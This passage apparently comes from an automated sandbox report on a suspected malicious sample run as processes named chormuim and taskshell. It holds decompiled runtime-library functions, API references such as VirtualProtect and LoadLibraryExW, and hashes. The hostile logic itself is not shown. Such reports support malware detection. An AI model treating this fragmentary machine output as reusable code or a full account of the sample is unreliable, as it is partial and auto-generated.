										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0040C1FB(_t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E0040BFC1(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E0040E744(_t90, 0, _t100);
					goto L4;
				}
			}

0x0040baaa
0x0040baba
0x0040bae0
0x00000000
0x0040bac1
0x0040bac1
0x0040bac4
0x0040bac6
0x0040bae7
0x0040baea
0x0040baec
0x00000000
0x00000000
0x0040baee
0x0040baf3
0x0040baf6
0x0040baf9
0x00000000
0x00000000
0x0040bafe
0x0040bb02
0x0040bb09
0x0040bb0c
0x0040bb0f
0x0040bb11
0x0040bb1b
0x0040bb13
0x0040bb16
0x0040bb16
0x0040bb22
0x0040bb24
0x0040bbe9
0x00000000
0x0040bb2a
0x0040bb2a
0x0040bb2d
0x0040bb2d
0x0040bb33
0x0040bb64
0x0040bb64
0x0040bb67
0x0040bbc0
0x0040bbc7
0x0040bbca
0x0040bbf5
0x0040bbf5
0x0040bbf7
0x00000000
0x0040bbfb
0x0040bbcc
0x0040bbcf
0x0040bbd2
0x0040bbd3
0x0040bbd6
0x0040bbd8
0x0040bbda
0x0040bbda
0x00000000
0x0040bbd8
0x0040bb69
0x0040bb6b
0x0040bb78
0x0040bb78
0x0040bb7c
0x0040bb7e
0x0040bb82
0x0040bb84
0x0040bb87
0x0040bb87
0x0040bb87
0x0040bb89
0x0040bb8a
0x0040bb94
0x0040bb95
0x0040bb9a
0x0040bb9d
0x0040bba0
0x0040bc03
0x0040bc03
0x0040bc07
0x00000000
0x0040bba2
0x0040bba2
0x0040bba4
0x0040bba6
0x0040bba8
0x0040bba8
0x0040bbaa
0x0040bbad
0x0040bbaf
0x0040bbb1
0x00000000
0x0040bbb3
0x0040bbb3
0x0040bbb3
0x00000000
0x0040bbb3
0x0040bbb1
0x0040bba0
0x0040bb6e
0x0040bb74
0x0040bb76
0x00000000
0x00000000
0x00000000
0x0040bb76
0x0040bb35
0x0040bb38
0x0040bb3a
0x00000000
0x00000000
0x0040bb3c
0x0040bbf1
0x0040bbf1
0x0040bbf1
0x00000000
0x0040bbf1
0x0040bb42
0x0040bb44
0x0040bb46
0x0040bb48
0x0040bb48
0x0040bb50
0x0040bb55
0x0040bb58
0x0040bb5a
0x0040bb5d
0x0040bb5f
0x00000000
0x0040bbe1
0x0040bbe1
0x0040bbe1
0x00000000
0x0040bb2a
0x0040bb24
0x0040bac8
0x0040bac8
0x0040bacd
0x0040bace
0x0040bacf
0x0040bad0
0x0040bad1
0x0040bad2
0x0040bad8
0x00000000
0x0040badd

APIs

__flush.LIBCMT ref: 0040BB6E
__fileno.LIBCMT ref: 0040BB8E
__locking.LIBCMT ref: 0040BB95
__flsbuf.LIBCMT ref: 0040BBC0

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C

Uniqueness

Uniqueness Score: -1.00%

Function 0041529F, Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0040EC86( &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0040BFC1(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x004152a9
0x004152b0
0x004152c7
0x00000000
0x004152b7
0x004152b9
0x004152d3
0x004152d8
0x004152db
0x004152de
0x00415307
0x0041530e
0x00415310
0x00415391
0x004153ac
0x004153ae
0x004152ee
0x004152ee
0x004152f1
0x004152f3
0x004152f6
0x004152f6
0x004152f6
0x004152f6
0x00000000
0x004152fc
0x00415370
0x00415370
0x00415375
0x0041537b
0x0041537e
0x00415380
0x00415383
0x00415383
0x00415383
0x00415383
0x00000000
0x00415387
0x00415312
0x00415315
0x0041531b
0x0041531e
0x00415345
0x00415348
0x0041534e
0x00000000
0x00000000
0x00415350
0x00415353
0x00000000
0x00000000
0x00415355
0x00415355
0x0041535b
0x0041535e
0x004152cc
0x004152cc
0x00415367
0x00000000
0x00415367
0x00415320
0x00415323
0x00000000
0x00000000
0x00415327
0x00415338
0x0041533e
0x00415340
0x00415343
0x00000000
0x00000000
0x00000000
0x00415343
0x004152e0
0x004152e3
0x004152e5
0x004152eb
0x004152eb
0x00000000
0x004152bb
0x004152bb
0x004152c0
0x004152c4
0x004152c4
0x00000000
0x004152c0
0x004152b9

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004134DB, Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x004134e0
0x004134e6
0x00413559
0x00000000
0x004134ed
0x004134ed
0x004134f0
0x0041350b
0x0041350e
0x0041352e
0x00413540
0x00413510
0x00413510
0x00413513
0x00000000
0x00413515
0x00413527
0x00413527
0x00413513
0x0041355e
0x00413562
0x004134f2
0x0041350a
0x0041350a
0x004134f0

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: taskshell.exe PID: 6056 Parent PID: 5360 taskshell.exeCOMMON

Execution Graph

Execution Coverage:	11.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	136
Total number of Limit Nodes:	4

Executed Functions

Function 00E68FA8, Relevance: 1.7, APIs: 1, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E691EE

Memory Dump Source

Source File: 00000007.00000002.559646298.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e60000_taskshell.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5aab061191f9fe61a7032d6fc98c26e3256fe6f12e447d11550c836ce34e05ed
Instruction ID: 4d1030720c11e43573159f6ab258edd6605a2981cb6d7c546286bacc91d67399
Opcode Fuzzy Hash: 5aab061191f9fe61a7032d6fc98c26e3256fe6f12e447d11550c836ce34e05ed
Instruction Fuzzy Hash: 2A7155B0A00B048FD764DF69E04479AB7F5BF88344F008A2AE49AE7B41DB35E845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E6D5C0, Relevance: 1.6, APIs: 1, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E6F8CA

Memory Dump Source

Source File: 00000007.00000002.559646298.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e60000_taskshell.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 7b52d47b20e99015bb860074d6f2a8ede2d1566531beb5a2c944493d68cf3638
Instruction ID: 5ae3c3e0eb079d8ac432129d50e26e802c0ff6b6059f4e610be2c756e5a1625f
Opcode Fuzzy Hash: 7b52d47b20e99015bb860074d6f2a8ede2d1566531beb5a2c944493d68cf3638
Instruction Fuzzy Hash: B951F2B1C003099FDB14CF99E884ADEBBB5BF48354F24852AE819AB210D7749886CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E6D5DC, Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E6F8CA

Memory Dump Source

Source File: 00000007.00000002.559646298.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e60000_taskshell.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5d23cb38b1f1c789cc1b380f5d5fcf759c0981b83af3eb056412b54212924dd9
Instruction ID: a2215cb55820ea8a23de882b482f4913d334785fb1c022fb197561f0234c9682
Opcode Fuzzy Hash: 5d23cb38b1f1c789cc1b380f5d5fcf759c0981b83af3eb056412b54212924dd9
Instruction Fuzzy Hash: D851C0B1D00309AFDB14CF99E884ADEBBF5BF48354F24852AE819BB210D7749885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E6F7B3, Relevance: 1.6, APIs: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E6F8CA

Memory Dump Source

Source File: 00000007.00000002.559646298.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e60000_taskshell.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 65cf87621bac03d126c1f755d48a85bcde356e11752a9b80d709506697e76c80
Instruction ID: 2b0e709b5b329ab380e34c6b3e386dd33a70452fca60126fe6c84ba6c5d0e80b
Opcode Fuzzy Hash: 65cf87621bac03d126c1f755d48a85bcde356e11752a9b80d709506697e76c80
Instruction Fuzzy Hash: 2C51AFB1D003099FDB14CF99E884ADEBBB5BF88354F24852AE819AB210D7759985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E6B8B8, Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E6B886,?,?,?,?,?), ref: 00E6B947

Memory Dump Source

Source File: 00000007.00000002.559646298.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e60000_taskshell.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6d405d8ff3bf50813e4359881f513bd6630ce8254c73d0c2fed936b70b1cd2f3
Instruction ID: e2c23cb7885719e1e20452d3c9fa583b8ea9ddd994609bec179fbb9cf1db2bcc
Opcode Fuzzy Hash: 6d405d8ff3bf50813e4359881f513bd6630ce8254c73d0c2fed936b70b1cd2f3
Instruction Fuzzy Hash: 543114B59043489FCB01CFA9D884ADEBFF8EF49350F14846AE554F7251C378A984CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E69D14, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E6B886,?,?,?,?,?), ref: 00E6B947

Memory Dump Source

Source File: 00000007.00000002.559646298.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e60000_taskshell.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c9aa7f1eec3b419d50d46ee80fbc631e828c7770b563c8fa9d511c014d5841f6
Instruction ID: 603c57940e39e35f6f3591478a11a22612c0339cfd9d60e4a3ebecf45dac6ea8
Opcode Fuzzy Hash: c9aa7f1eec3b419d50d46ee80fbc631e828c7770b563c8fa9d511c014d5841f6
Instruction Fuzzy Hash: 8921E6B59002089FDB10CF9AD584ADEBBF8EF48364F14842AE954B7310D374A954DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E69408, Relevance: 1.6, APIs: 1, Instructions: 56
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E69269,00000800,00000000,00000000), ref: 00E6947A

Memory Dump Source

Source File: 00000007.00000002.559646298.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e60000_taskshell.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b27e300f5c95158cc645e9da9fd3f648ad03ab459a2a601739a30113d577c3b3
Instruction ID: 0a4e8c1a20b46775dc84879f09492653a6f0acdbb906d94bdd421474a17d100b
Opcode Fuzzy Hash: b27e300f5c95158cc645e9da9fd3f648ad03ab459a2a601739a30113d577c3b3
Instruction Fuzzy Hash: 881114B68002099FCB10CF9AD484BDEFBF8EB88354F14842AD429B7301C775A946CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E68348, Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E69269,00000800,00000000,00000000), ref: 00E6947A

Memory Dump Source

Source File: 00000007.00000002.559646298.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e60000_taskshell.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9c71084a6b0bf3ff44f1f6dda07dc2ea04c359cd317433e85c00630975f71dc8
Instruction ID: 9d9d5646e32f2d9d7851bdece73e637d6ad711a93eec6b983a0f53f9074a230b
Opcode Fuzzy Hash: 9c71084a6b0bf3ff44f1f6dda07dc2ea04c359cd317433e85c00630975f71dc8
Instruction Fuzzy Hash: 5211E7B59002099FDB10CF9AD484BDEFBF8EB48354F14842AE425B7301C775A955CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E694B0, Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E69269,00000800,00000000,00000000), ref: 00E6947A

Memory Dump Source

Source File: 00000007.00000002.559646298.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e60000_taskshell.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3985bc615965806f24e3207fbbf4e766082086842619eaf3b53246b655040e87
Instruction ID: 15d7f89acc118d36e6c4fb59a3267154983ae91a92b7951d8c0f649107ac0e4d
Opcode Fuzzy Hash: 3985bc615965806f24e3207fbbf4e766082086842619eaf3b53246b655040e87
Instruction Fuzzy Hash: 021102B69043088FCB10CBD8E4447DEBBF8EF84364F14846AD959B7652C3799806CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E69188, Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E691EE

Memory Dump Source

Source File: 00000007.00000002.559646298.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e60000_taskshell.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4a3c6061bd2a046b6141941ec12f2428a5670b6b279a5fa84375aea5cad2892a
Instruction ID: 187c06f1c3be09c2ca822c19caf88c587a40bded265e090c6d2971af4d019afe
Opcode Fuzzy Hash: 4a3c6061bd2a046b6141941ec12f2428a5670b6b279a5fa84375aea5cad2892a
Instruction Fuzzy Hash: 6E11E3B5C006498FCB10CF9AD844BDEFBF8EB88324F14842AD869B7600D375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E6D614, Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,00E6F9E8,?,?,?,?), ref: 00E6FA5D

Memory Dump Source

Source File: 00000007.00000002.559646298.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e60000_taskshell.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: d49957b3560994eaf8b44205d612678544f1ac9f6cdff025ff1f4e29ccda3384
Instruction ID: dfcf67fe5ea3b91177ddb1aefa00c234a1dc1883c6e685da25c80e8568000efc
Opcode Fuzzy Hash: d49957b3560994eaf8b44205d612678544f1ac9f6cdff025ff1f4e29ccda3384
Instruction Fuzzy Hash: BB1106B58002089FDB10DF99E489BDEFBF8EB48324F24842AD959B7340C375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E6F9FB, Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,00E6F9E8,?,?,?,?), ref: 00E6FA5D

Memory Dump Source

Source File: 00000007.00000002.559646298.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e60000_taskshell.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 92c876ccb06d78e4008acce387d3318fbb63c6fc014389e220c82c114315cfb2
Instruction ID: 151917caf8e9b3afc63067533793c601cf7e587437a11452caec82aab0605e2b
Opcode Fuzzy Hash: 92c876ccb06d78e4008acce387d3318fbb63c6fc014389e220c82c114315cfb2
Instruction Fuzzy Hash: 4B1103B58002098FDB10CF99E585BDEBBF8EB48324F14842AD559B7300C374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: chormuim.exe PID: 6504 Parent PID: 3556 chormuim.exeCOMMON

Executed Functions

Function 00007FFC089D5ED9, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 717
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CZ_H, xrefs: 00007FFC08A2B4D1

Memory Dump Source

Source File: 00000008.00000002.410605667.00007FFC089D0000.00000040.00000001.sdmp, Offset: 00007FFC089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffc089d0000_chormuim.jbxd

Similarity

API ID:
String ID: CZ_H
API String ID: 0-2364148624
Opcode ID: 13a2daf0ba12cc0544e8519a6848b7ad83757235c97557d745144221a71fb44c
Instruction ID: 83e65d7dadc28c58378ac021439d014b3cf0eb9d04b9017f1d6c312f86248f5f
Opcode Fuzzy Hash: 13a2daf0ba12cc0544e8519a6848b7ad83757235c97557d745144221a71fb44c
Instruction Fuzzy Hash: 3E32E33290C66D8FEB55EB1CE8557E9BBB0EF95321F0041BAC04DD7192CE345886CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC089D8E08, Relevance: 1.8, APIs: 1, Instructions: 280
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32 ref: 00007FFC089D9006

Memory Dump Source

Source File: 00000008.00000002.410605667.00007FFC089D0000.00000040.00000001.sdmp, Offset: 00007FFC089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffc089d0000_chormuim.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 80a1bd6ad7fa15f0aeb6a1bb9ab91acf8c150b47eef322fb0526266bc2595a56
Instruction ID: 19c02b3adb378d8cf385b59f1ff82a5068314e868cc0ddf2437b00c27ea1051e
Opcode Fuzzy Hash: 80a1bd6ad7fa15f0aeb6a1bb9ab91acf8c150b47eef322fb0526266bc2595a56
Instruction Fuzzy Hash: 1691907180D7888FDB06DF6888656E9BFF0EF17315F0541EBC089DB2A3D624694ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC089D7A63, Relevance: 1.7, APIs: 1, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.410605667.00007FFC089D0000.00000040.00000001.sdmp, Offset: 00007FFC089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffc089d0000_chormuim.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea95af2791d7a67cea3ef1a8782cdb1f98bcf9a223f986445d3a375dbc8b0be9
Instruction ID: 6322dca5535a9578578089979c81e8e69d7c7493dc70e935970a0b779c95af05
Opcode Fuzzy Hash: ea95af2791d7a67cea3ef1a8782cdb1f98bcf9a223f986445d3a375dbc8b0be9
Instruction Fuzzy Hash: A0515C70908A1C8FDB58EF98C885BEDBBF1FB69315F10416ED44AE3251DB70A981CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC089D79F3, Relevance: 1.7, APIs: 1, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.410605667.00007FFC089D0000.00000040.00000001.sdmp, Offset: 00007FFC089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffc089d0000_chormuim.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa183334918ecfaa67ca55d46f26d42548f925c883b828db108614a9992b3518
